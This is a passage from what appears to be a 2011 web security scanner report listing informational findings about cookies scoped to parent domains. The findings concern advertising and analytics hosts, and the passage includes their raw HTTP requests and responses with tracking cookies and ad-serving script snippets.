Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_tycpx7Bqtax7Dzxxfzx7Bgpx60apgf=[CS]v4|26E3F9DC051D33BE-40000101E0003608|4DC7F3B6[CE]; s_vi_l8dx7Ebox7Ccdo=[CS]v4|26E3F9DC05010F7F-6000010EC0264A83|4DC7F3B6[CE]; s_vi_gydhix7Eenks=[CS]v4|26E408110515A577-600001774000CAA9|4DC81020[CE]; s_vi_nyhylx7B8x3Dx3C=[CS]v4|26E40823051586B2-60000175A008DCBA|4DC81044[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E40823051586B2-60000175A008DCBC|4DC81044[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E49D3B850131F4-60000102002237AC|4DC93A73[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E49D3B850131F4-60000102002237AE|4DC93A73[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E49D3B850131F4-60000102002237B0|4DC93A73[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E49D3B850131F4-60000102002237B2|4DC93A73[CE]

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 13:33:38 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ugcx3Exxx3Eufqx7Ecfyx7Cx7Cu=[CS]v4|0-0|4DCBE1B2[CE]; Expires=Tue, 10 May 2016 13:33:38 GMT; Domain=.2o7.net; Path=/
Location: http://ewsnewspapers.112.2o7.net/b/ss/ews.h.evansville/1/H.22.1/s22444411469623?AQB=1&pccr=true&&ndh=1&t=12%2F4%2F2011%208%3A30%3A39%204%20300&ce=UTF-8&pageName=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&g=http%3A%2F%2Fwww.courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&cc=USD&ch=ENTERTAINMENT&events=event1&h1=ews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&h2=ews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&c3=ECP&c4=DJEFF&c6=LOCAL&c7=ARTICLE&c8=HEDER-HERE-IN-THIS-SPP-PPPPP&c10=courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&c16=Entertainment%20(NPC)&c19=ECP%3Aews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&c25=8%3A00AM&c26=Thursday&c27=Weekday&c30=ECP&c43=Evansville%20Courier%20%26%20Press%20and%20Evansville%20Courier%20%26%20Press&c44=1&c45=5&c50=Entertainment%2FLocal&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 13:33:38 GMT
Last-Modified: Fri, 13 May 2011 13:33:38 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www109
Content-Length: 0
Content-Type: text/plain

8.39. http://hits.nextstat.com/cgi-bin/wsv2.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hits.nextstat.com
Path:   /cgi-bin/wsv2.cgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/wsv2.cgi?108645 HTTP/1.1
Host: hits.nextstat.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: webStat_108645=12beedaea78edd58b2a6f91af1fe6b38; expires=Sun, 09-May-2021 13:32:25 GMT; path=/; domain=.nextstat.com
Set-Cookie: webStat_108645_mv=12beedaea78edd58b2a6f91af1fe6b38; expires=Sun, 09-May-2021 13:32:25 GMT; path=/; domain=.nextstat.com
Content-Length: 4096
Connection: close
Content-Type: text/html; charset=UTF-8

function wf_get_rfsqv() {
var q = (WS_rfs_3p && WS_ref.indexOf('?') > 0)?WS_ref.substring(WS_ref.indexOf('?')+1):WS_rfs.location.search.substring(1),v = q.split("&");
for (var i=0;i<v.length;i++)
...[SNIP]...
8.40. http://hits.nextstat.com/scripts/wsb.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hits.nextstat.com
Path:   /scripts/wsb.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scripts/wsb.php?WSc=yes&WSpn=&WSref=&pg=28925&ac=108645&w=1920&h=1200&c=16&js=1.6&WSvp=http%3A//orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html&tz=300&ls=&cam=undefined&evt=undefined HTTP/1.1
Host: hits.nextstat.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webStat_108645=da8aee5f04e7ebdfbf66e7f2c334e7d5; webStat_108645_mv=da8aee5f04e7ebdfbf66e7f2c334e7d5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: webStat_108645_last=6c0c2cc469f86170c8aa98036158dc8b; path=/; domain=.nextstat.com
Set-Cookie: webStat_108645_lastvisit=12+May+2011+06%3A33%3A43; expires=Sun, 09-May-2021 13:33:43 GMT; path=/; domain=.nextstat.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 195
Connection: close
Content-Type: image/png

.PNG
.
...IHDR...x.........|.k.....PLTE.............xIDAT..c`..0.`.o`..`."..0..0X0.30..`.a`n...| .n.P....E@..... ...<P}D).(``..w..?...?........@.H|6.S.0$......H.1....z....-...jw....IEND.B`.
8.41. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=541&size=300x250&inv_code=1588565&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1588565 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-ooBEAoYASABKAEw9cKv7gQQ9cKv7gQYAA..; path=/; expires=Wed, 10-Aug-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb198688=-@L6D208WMq5cpg20/dR_2Rq$?enc=PDw8PDw8DEAAAAAAAAAIQAAAAAAAAAhAYhBYObQIEUAK16NwPQoUQHRTtxg1ORd6SsYda6b2ziV14ctNAAAAABRWAwAdAgAA4gEAAAIAAAAPCAQAksAAAAEAAABVU0QAVVNEACwB-gAkAwAADhABAgUCAAUAAAAAQBbqiQAAAAA.&tt_code=1588565&udj=uf%28%27a%27%2C+12656%2C+1305207157%29%3Buf%28%27c%27%2C+60150%2C+1305207157%29%3Buf%28%27r%27%2C+264207%2C+1305207157%29%3B&cnd=!SRusDwj21QMQj5AQGAAgkoEDMAA4pAZAAEjiA1CUrA1YAGDaAWgAcAB4AIABFogB5hWQAQGYAQGgAQOoAQOwAQG5AQrXo3A9ChRAwQEK16NwPQoUQMkBMzMzMzMz9z_QAQA.&ccd=!ZARnJwj21QMQj5AQGJKBAyAA; path=/; expires=Fri, 13-May-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(ByDuq)W^19LVSfz9pR%*ZYG$q99Yuq/8WW+OZ<tV7`c1iRBAF0AjVTkAwOlt@lPUAZ6Jl:O2E6SNUC?FCurmX(R+I@3QnKv9%3ZeoT81tBj(_yLd$9SnvS(`p+IuV+`hf@7Jx26vK2fXWC$sIYvfgg:@BovHT96sY2^=P@LEqX4S#jqGct?v1A1I/vTA^>l3*5.-C=)@tgPx+bvY.RBYzyCLxiN*KmZkEFg(oEG-3_JrtQeKhlW'@l:!yPfu4(r>y2ftLNWl5+h@y!QeL8avOr+bkC^F<A?ba?dk760>y?6j2.'9s!F*+wE_X?AuNkL7M:IF84W#AWuxnqyZmCg)tFh4ZcY37>8Lcx5h%^$6oAkZ-WR$e3r<HnX?xLdr?PiPwulO]Jx1Mqy'fSa`1jYL[t]x1]#EdEMtygIe>*0$mP^?/l78sfudt*pccMNht6iGA6)+CyD/qG7eq>q=hBwU5h=tpr7wl$fg`plOqjf-je:`V#/YmIYduPo0+MxLW0VH%hehjHqNdWRzI(-nyc@S3EdNC<OKUKdP]kwScNWFj4`d920@lOkc4UWBXbUQ8@VfWqyk6Mh7>s5K*H[VZxv1466@vdcpA7abl-RkC-Zf444Z)<3o6HA?m)uRuv7t7[RWJj2>)>DD!WTU%g$L2LqQYlI`wp)t!PV0qm_6Cj>2/roFW)l8A@vbHxOrkIMm; path=/; expires=Wed, 10-Aug-2011 13:32:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 13:32:37 GMT
Content-Length: 268

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/st?anmember=541&anprice=300&ad_type=ad&ad_size=300x250&section=1588565"></scr'+'ipt>');document.write('<img src="http:/
...[SNIP]...
8.42. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=119482&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz00MTYmcHhpZD02MDY4JnB4aWQ9NTQ3JnB4aWQ9NTc3MiZweGlkPTQ2OCZweGlkPTExMzY%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-ooBEAoYASABKAEwlMKv7gQQlMKv7gQYAA..; acb126273=-@L6D208WMq5cpg20/dR>zXWq?enc=PDw8PDw8DEAAAAAAAAAIQAAAAAAAAAhAYhBYObQIEUAK16NwPQoUQB6f76tOO90oSsYda6b2ziUU4ctNAAAAABRWAwAdAgAA4gEAAAIAAAAPCAQAksAAAAEAAABVU0QAVVNEACwB-gAkAwAAxhABAgUCAAUAAAAA5xc56wAAAAA.&tt_code=1588565&udj=uf%28%27a%27%2C+12656%2C+1305207060%29%3Buf%28%27c%27%2C+60150%2C+1305207060%29%3Buf%28%27r%27%2C+264207%2C+1305207060%29%3B&cnd=!RRvkDgj21QMQj5AQGAAgkoEDMAA4pAZAAEjiA1CUrA1YAGDaAWgAcAB4AIABFogB4hWQAQGYAQGgAQOoAQOwAQG5AQrXo3A9ChRAwQEK16NwPQoUQMkBMzMzMzMz9z_QAQA.&ccd=!ZARnJwj21QMQj5AQGJKBAyAA; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hg0)m)_Uh2u:[r@PdBuy]S=FdY*FXw(hO!$dY(koMBFV95dEhO@gS%S=?Gc6U#?^ITW.C%.HqhKFPS0R:Ol/][9xsNXM?#=popAjMJ!=!P'kjdtE#agd`VY]hTg'7jxCPQLa-IWtYkK56-6Rj<>QtuQMu]Fli*-A:DG1t]9*q=ZNiI'q#a$$?('BmwWkq5M+gDc$AkjBcFpf.^Km7HkC6E*s*W!hVTSm=VV<zcaLjQ#u^1u!hUCx)6f1NpiP^1'?YjrnLNx0X+hS.)S$dNhv^T14kCT98KUh_Mm2P`S>yQhx3G-Rt#$gkLo]g)HuNl?T7v:=$P9r<oMjHGZ?fL9-L4qV?C[kwp-eJtVF#peHsxA-xhGAPY@nTUG3*pBV[T@@xw68=86_wVWO9'0NB.S=4gt<_3sB/bm8)W^6FLt^)4EgEJ/n!hdKiPI?u]%e5$Lu3[D]fwa%'PFavH5F)k4ZOPiuvV>cQWQorFp=v5%adk(P$^d0xFLswEkQxCTdbg4S$7QP#j1V6Zc+KDDhon2h0OFfImh+#oLE(br@zr_m-M%^o6v$@kezl*!N3zot*`H_R!Crp3O+$wmeHb:f=swYD<R*X1j7U1HH64sb>8f09y:8/XSP-Lk*'#mnr*d(+ZL4q_tb%p8LE0px*?qu^KY>qH>0:w9Q8K?zQK*Z1FYq4so09Y?yx#wwNwyrk6Ak

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:34:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:34:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:34:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(H.MX9)_c8%r9k>I9Fs/lDCm@m%aaoUQ!7QSDLeOJ8#%9ZVp(8]@gS%S=?GcnfylMw17$b)92!ZS.^.LpADBz%(R-fC*dkH/(6aknf3]vrI<lkEx1#2(x4)Q'hu(fX$hy)7-ZT3)t$Rg<7I+Bg.0OHlTJz4MRBsm2.y0_#FBs0?8nX9$*Xi`gA`F@'jmA33@n+%z6(u6bek:iXLY9f]6IJa)tAjQKXpXjP.zz493HBMUEEE*!vB6RV8aLW:>at^Bm4Bb1]M$RJ_$R(?QS=X2u's^/cuTyzwnqPoc=7yn*miVy@.SYnR@EPfNiVjyx-PiGvorkhIU(?Q!q.VLPOB+nIirYwcMG**0Oo1LofO)IObJoVO8Xlz]-.IMOwog.vY(BPmrr'I:uG-9Jg(x.h^vN?C%EFC3Q(12wezxcnx@NgUPp#6`GI%)sA]#^bE/ngv/`$kUjv5+O4zW*8AS=l8T8XjE0@CT6ZOZ>3O[(mhky/nO:s3DU26_I*kGhu>hFp?>-au@%zz:-(Kt(XD<@/._X1D4mncP-cQ!7ImeSXewri?lKAdKQL0Rg`jelNsC/IcQ9%t_$Ub><*HnS(]3?C(]D`%>CYaqwERcS#AUPg!'0P]qP)9J+9DrCVO7Je90tOvIO>RA1po$ip3J2iC1^Rg%H-LEiq9xVP4VKj'mu#Wy1hei<Nx/]P$d]wF@=80TAJ/!Rg@VCIXt39nnu'27f; path=/; expires=Wed, 10-Aug-2011 13:34:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 13:34:09 GMT
Content-Length: 187

document.write('<img src="http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/2724386019227846218/gif?meta=appNexus" width="1" height="1"/>');
8.43. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:2724386019227846218 HTTP/1.1
Host: image2.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/aboutus/overview
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; __utmb=103266945.3.10.1305207252; __utmc=103266945; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:32 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_57=476-uid:2724386019227846218; domain=pubmatic.com; expires=Sun, 11-May-2014 13:34:32 GMT; path=/
Set-Cookie: PUBRETARGET=82_1399045295.806_1336140548.78_1399815272; domain=pubmatic.com; expires=Sun, 11-May-2014 13:34:32 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
8.44. http://image3.pubmatic.com/AdServer/UPug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/UPug?operId=2&pubId=398&pixId=6&ran=0.19279520929519856&pageURL=http://www.pubmatic.com/ HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:27 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=C1979996-4E95-4668-85DB-5560A01CB783; domain=pubmatic.com; expires=Fri, 11-May-2012 13:34:27 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 473

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/398/6/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true"
...[SNIP]...
8.45. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=G07610&bpid=S0277 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; 